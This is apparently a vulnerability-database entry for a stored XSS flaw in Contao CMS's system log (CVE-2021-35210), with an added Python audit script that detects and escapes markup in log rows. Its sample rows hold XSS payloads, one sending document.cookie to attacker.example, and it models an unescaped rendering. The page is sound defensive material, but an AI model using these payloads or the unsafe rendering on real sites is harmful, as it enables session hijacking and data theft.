CVE-2021-35210
Description
Contao 4.5.x through 4.9.x before 4.9.16, and 4.10.x through 4.11.x before 4.11.5, allows XSS. It is possible to inject code into the tl_log table that will be executed in the browser when the system log is called in the back end.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Contao CMS versions 4.5.x-4.9.15 and 4.10.x-4.11.4 allow stored XSS via the tl_log table, executed in the backend system log.
Vulnerability
Contao CMS versions 4.5.x through 4.9.x before 4.9.16, and 4.10.x through 4.11.x before 4.11.5, contain a stored cross-site scripting (XSS) vulnerability in the tl_log table [1]. An attacker can inject arbitrary JavaScript code into log entries that are stored in this table. When an administrator accesses the system log in the back end, the injected code is executed in the browser [1].
Exploitation
An attacker must be able to get attacker-controlled text written into the tl_log table. Because tl_log is populated by the application's own logging, any code path that records attacker-influenced input in a log message is a candidate injection point; the cited advisories do not enumerate which paths are reachable, so direct database write access or a separate vulnerability (e.g., SQL injection) are not the only routes and should not be assumed as prerequisites [1]. No user interaction beyond an administrator opening the system log in the back end is required for the XSS to trigger [1]. Because the payload is stored, it executes every time the log view is loaded until the entry is removed or the rendering is fixed.
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the authenticated administrator's browser session. This can lead to session hijacking, theft of sensitive data, defacement of the back end interface, or further compromise of the Contao installation [1].
Mitigation
Upgrade to Contao version 4.9.16 or 4.11.5 (or any later release) to remediate the vulnerability [1][3][4]. No workaround is documented. After upgrading, review existing tl_log entries for injected markup so that any payload written before the fix is identified and removed rather than left in place. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities catalog.
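The following is an added example, not Contao code and not taken from the cited advisories. It models the stored-XSS mechanism described under Vulnerability and Exploitation and the post-upgrade audit suggested under Mitigation: a few constructed tl_log rows (the column set id/tstamp/source/action/username/text is assumed to match a tl_log export, and the sample messages are invented) are scanned for HTML or script markup, and the same row is rendered once unescaped, as a minimal model of the vulnerable behaviour, and once HTML-escaped, as a patched back end should render it.

```python
"""Audit helper for CVE-2021-35210 (added example, not Contao code).

- suspicious_rows(): flag tl_log rows whose free-text fields contain markup
  that has no business in a plain-text log message.
- render_unsafe()/render_safe(): contrast raw interpolation of the log text
  into an HTML table cell with HTML-escaped output.

Column names and sample rows are assumptions constructed for this example.
"""
import html
import re

# Markup that should never appear in a plain-text log entry:
# any HTML tag, a javascript: URL, or an inline event handler attribute.
_MARKUP = re.compile(
    r"<\s*/?\s*[a-zA-Z][^>]*>|javascript\s*:|\bon[a-z]+\s*=",
    re.IGNORECASE,
)

# Constructed sample rows shaped like a tl_log export (column set assumed).
SAMPLE_ROWS = [
    {"id": 1, "tstamp": 1622505600, "source": "FE", "action": "ACCESS",
     "username": "",
     "text": 'Invalid username or password for user "alice"'},
    {"id": 2, "tstamp": 1622505660, "source": "FE", "action": "ACCESS",
     "username": "",
     "text": 'Invalid username or password for user '
             '"<script>fetch(\'https://attacker.example/?c=\'+document.cookie)</script>"'},
    {"id": 3, "tstamp": 1622505720, "source": "BE", "action": "CRON",
     "username": "admin",
     "text": "Purged the image cache"},
    {"id": 4, "tstamp": 1622505780, "source": "FE", "action": "ERROR",
     "username": "",
     "text": "<img src=x onerror=alert(1)>"},
]


def suspicious_rows(rows):
    """Return the rows whose text or username field contains markup."""
    flagged = []
    for row in rows:
        for field in ("text", "username"):
            value = row.get(field) or ""
            if _MARKUP.search(value):
                flagged.append(row)
                break
    return flagged


def render_unsafe(row):
    """Model of the vulnerable rendering: raw text dropped into a table cell."""
    return f"<td>{row['text']}</td>"


def render_safe(row):
    """Escaped rendering: tags and quotes become inert entities."""
    return f"<td>{html.escape(row['text'], quote=True)}</td>"


if __name__ == "__main__":
    for row in suspicious_rows(SAMPLE_ROWS):
        print(f"tl_log id={row['id']} contains markup: {row['text']!r}")
    print("unsafe:", render_unsafe(SAMPLE_ROWS[1]))
    print("safe:  ", render_safe(SAMPLE_ROWS[1]))
```

The regex is deliberately broad (any tag-like token, javascript: URLs, on*= handlers) because a log audit should err toward false positives that a human reviews; a row flagged here is a reason to inspect it, not proof of compromise. Escaping at render time is the durable fix, since it protects the view regardless of what an attacker managed to get logged.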
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| contao/core-bundle | Packagist | >= 4.5.0, < 4.9.16 | 4.9.16 |
| contao/core-bundle | Packagist | >= 4.10.0, < 4.11.5 | 4.11.5 |
| contao/contao | Packagist | >= 4.5.0, < 4.9.16 | 4.9.16 |
| contao/contao | Packagist | >= 4.10.0, < 4.11.5 | 4.11.5 |
Affected products
- Contao/Contao (GHSA coordinates; no CPE assigned): versions >= 4.5.0, < 4.9.16, plus one further range (see Affected packages above)
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
[1] github.com/advisories/GHSA-h58v-c6rf-g9f7 (GitHub Security Advisory)
[2] nvd.nist.gov/vuln/detail/CVE-2021-35210 (NVD entry)
[3] contao.org/en/security-advisories/cross-site-scripting-in-the-system-log-2021.html (vendor advisory, confirmed)
[4] github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2021-35210.yaml (FriendsOfPHP advisory, contao/contao)
[5] github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2021-35210.yaml (FriendsOfPHP advisory, contao/core-bundle)
[6] github.com/contao/contao/security/advisories/GHSA-h58v-c6rf-g9f7 (vendor GitHub advisory, confirmed)
News mentions
No linked articles in our index yet.